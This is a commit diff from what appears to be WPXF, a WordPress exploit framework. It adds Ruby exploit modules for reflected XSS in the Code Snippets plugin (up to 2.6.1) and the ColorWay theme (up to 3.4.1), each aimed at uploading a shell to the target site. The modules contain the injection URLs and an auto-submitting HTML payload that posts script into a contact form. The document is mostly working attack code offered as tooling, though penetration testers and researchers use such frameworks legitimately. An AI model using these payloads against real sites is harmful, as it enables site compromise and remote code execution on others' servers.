Merged development into master

Author: rastating

modules/exploits/code_snippets_reflected_xss_shell_upload.rb

@@ -0,0 +1,32 @@
+class Wpxf::Exploit::CodeSnippetsReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Code Snippets <= 2.6.1 Reflected XSS Shell Upload',
+      author: [
+        'Burak Kelebek',                  # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8566'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_code_snippets_wordpress_plugin.html']
+      ],
+      date: 'Jul 24 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('code-snippets', '2.7')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=snippets&tag=%5C%5C%27%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
+  end
+end

modules/exploits/colorway_reflected_xss_shell_upload.rb

@@ -0,0 +1,45 @@
+class Wpxf::Exploit::ColorwayReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'ColorWay <= 3.4.1 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster',                  # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8568'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html']
+      ],
+      date: 'Jul 26 2016'
+    )
+
+    register_option(
+      StringOption.new(
+        name: 'contact_url',
+        desc: 'The URL of a contact form',
+        required: true
+      )
+    )
+  end
+
+  def check
+    check_theme_version_from_style('colorway', '3.4.2')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{datastore['contact_url']}', {
+        contactName: "\\"><script>#{xss_include_script}<\\/script>",
+        email: '#{Utility::Text.rand_alpha(5)}',
+        comments: '',
+        submitted: 'true'
+      });
+    </script></body></html>
+    |
+  end
+end

modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb

@@ -10,6 +10,7 @@ def initialize
         'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
       ],
       references: [
+        ['WPVDB', '8567'],
         ['URL', 'http://blog.rastating.com/woo-custom-checkout-field-1-3-2-csrf-stored-xss-disclosure']
       ],
       date: 'Jul 23 2016'